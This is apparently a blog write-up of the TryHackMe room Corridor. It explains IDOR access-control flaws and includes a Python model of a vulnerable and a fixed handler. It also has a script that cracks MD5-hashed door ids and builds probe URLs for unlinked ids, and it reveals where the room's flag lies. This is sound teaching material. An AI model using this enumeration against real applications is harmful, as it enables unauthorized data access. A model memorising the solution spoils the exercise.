Penetrating Networks

Navid Fazle Rabbi
Sr. Security Researcher
Offensive Security Research
bKash Ltd.

TryHackMe | Corridor

October 11, 2022

In this blog post, I will walk through the TryHackMe room Corridor, which explores a potential IDOR vulnerability in a web application.

What is an IDOR Vulnerability?

Insecure Direct Object Reference (IDOR) is an access control vulnerability that arises when an application uses user-supplied input to access objects directly, without verifying that the requesting user is allowed to reach that particular object. The term became widely known when it was included in the OWASP Top Ten for 2007, but it is only one of many mistakes in implementing access restrictions that can lead to such bypasses. IDOR vulnerabilities can enable either horizontal privilege escalation (reaching another user's data at the same privilege level) or vertical privilege escalation (reaching data or functionality reserved for a higher privilege level).
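As an added example (not code from the original post or the room), here is a minimal Python model of the same mistake in a corridor-of-doors style app, with constructed door data: the vulnerable handler resolves whatever reference the client sends and never asks who the user is, while the fixed handler performs the same lookup and then checks that the session user owns the door. The names `Door`, `open_door_vulnerable`, `open_door_fixed` and `is_denied` are my own.

```python
import hashlib
from dataclasses import dataclass
from typing import Dict


@dataclass(frozen=True)
class Door:
    number: int
    owner: str
    contents: str


# Constructed sample data, not the room's real doors or flag.
DOORS: Dict[int, Door] = {
    0: Door(0, "admin", "FLAG{constructed-example}"),
    1: Door(1, "alice", "alice's locker"),
    2: Door(2, "bob", "bob's locker"),
}


def door_ref(number: int) -> str:
    """The reference the app puts in its URLs: md5 of the decimal door number.
    Hashing only obscures the id; anyone can recompute it for any number."""
    return hashlib.md5(str(number).encode()).hexdigest()


# Server-side reverse map from exposed reference to door number.
REF_TO_NUMBER: Dict[str, int] = {door_ref(n): n for n in DOORS}


class NotFound(Exception):
    pass


def open_door_vulnerable(user: str, ref: str) -> str:
    """IDOR: resolves the client-supplied reference and never consults `user`.
    Whoever computes md5("0") reads the admin door."""
    number = REF_TO_NUMBER.get(ref.lower())
    if number is None:
        raise NotFound(ref)
    return DOORS[number].contents


def open_door_fixed(user: str, ref: str) -> str:
    """Same lookup, then an authorization check against the session user.
    Unauthorized and nonexistent doors raise the same error, so a caller
    cannot use the response to confirm which references exist."""
    number = REF_TO_NUMBER.get(ref.lower())
    if number is None or DOORS[number].owner != user:
        raise NotFound(ref)
    return DOORS[number].contents


def is_denied(user: str, ref: str) -> bool:
    """True when the fixed handler refuses `user` access to `ref`."""
    try:
        open_door_fixed(user, ref)
    except NotFound:
        return True
    return False


if __name__ == "__main__":
    admin_ref = door_ref(0)
    print("vulnerable handler gives bob:", open_door_vulnerable("bob", admin_ref))
    print("fixed handler denies bob:", is_denied("bob", admin_ref))
```

The check that matters is the `owner != user` comparison on the server: the hashed reference in the URL contributes nothing to authorization, and returning an identical error for "forbidden" and "nonexistent" keeps an attacker from using the response to map out which object ids are real.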

Reference: IDOR

Solution

The prompt to the problem says –

From this, we can infer two things –

  • The vulnerability we are looking for is an IDOR.
  • The URL endpoints hold significant meaning. They look like hexadecimal values, which may turn out to be hashes.

Let us visit the URL –

We find the above page, where each of the doors is hyperlinked to a different URL. Visiting each of the URLs, we get the following –

All the URLs show the same image. Coming back to the main page and looking at the page source, we get –

All the URL endpoints are the same length and consist only of hexadecimal characters, which supports our second assumption that they are hashes. Using an online hash-lookup website, we try to crack the 'probable' hash values.

The first one cracks. Now we try the rest of the values –

The endpoints turn out to be the MD5 hashes of the numbers 1 to 13, one per door. Following our first assumption, this looks like an IDOR: the door identifier is a predictable integer that has merely been hashed, not an access check. Let us try the two neighbouring values that the page does not link to, 0 and 14. First, we compute the MD5 hash of each.

Now, trying 0 –

We find the flag at the endpoint for the MD5 hash of 0 (cfcd208495d565ef66e7dff9f98764da). The lesson of the room is that hashing an object identifier hides it but does not authorize access to it; the server must still check that the requesting user is permitted to view the object it resolves.
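The enumeration above, written out as an added Python example that is not part of the original writeup or the room: build a table of md5(str(i)) for small integers, resolve the observed tokens back to ids, list the ids in and around that range which the page never links, and build the URLs to probe. The 13 observed tokens are constructed here as the MD5 of "1" to "13", since that is what the writeup establishes them to be, and the base URL `http://MACHINE_IP` is a placeholder, not the room's address.

```python
import hashlib
from typing import Dict, List, Optional


def md5_hex(value: str) -> str:
    return hashlib.md5(value.encode()).hexdigest()


def build_table(limit: int) -> Dict[str, int]:
    """md5(str(i)) -> i for 0 <= i < limit. Small decimal ids are the first
    candidate set to try when every endpoint is an equal-length hex token."""
    return {md5_hex(str(i)): i for i in range(limit)}


def resolve(tokens: List[str], table: Dict[str, int]) -> Dict[str, Optional[int]]:
    """Map each observed token to an id, or None when the table has no match.
    A None means the id space is not small decimals, or is larger than `limit`."""
    return {t: table.get(t.lower()) for t in tokens}


def unlinked_ids(ids: List[int], margin: int = 1) -> List[int]:
    """Ids inside the observed range, or within `margin` of its ends, that the
    page never links to. These are the IDOR candidates worth requesting."""
    if not ids:
        return []
    present = set(ids)
    lo, hi = min(ids) - margin, max(ids) + margin
    return [i for i in range(lo, hi + 1) if i not in present]


def probe_urls(base: str, ids: List[int]) -> List[str]:
    """Rebuild the app's own reference scheme for each candidate id."""
    return [f"{base}/{md5_hex(str(i))}" for i in ids]


# Constructed stand-ins for the 13 door links on the page (md5 of "1".."13").
OBSERVED: List[str] = [md5_hex(str(n)) for n in range(1, 14)]
TABLE: Dict[str, int] = build_table(10_000)


if __name__ == "__main__":
    resolved = resolve(OBSERVED, TABLE)
    ids = [i for i in resolved.values() if i is not None]
    unresolved = [t for t, i in resolved.items() if i is None]
    print("recovered ids:", ids)
    print("tokens not in table:", unresolved)
    # Placeholder host; substitute the room's machine address.
    for url in probe_urls("http://MACHINE_IP", unlinked_ids(ids)):
        print("probe", url)
```

A lookup miss (`None`) is the signal to widen the candidate set, for example to a larger integer range, zero-padded numbers or other hash functions, rather than to conclude the tokens are random. When the recovered ids form a contiguous block, `unlinked_ids` returns exactly the values just outside it, 0 and 14 in this room, which are the requests that led to the flag.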
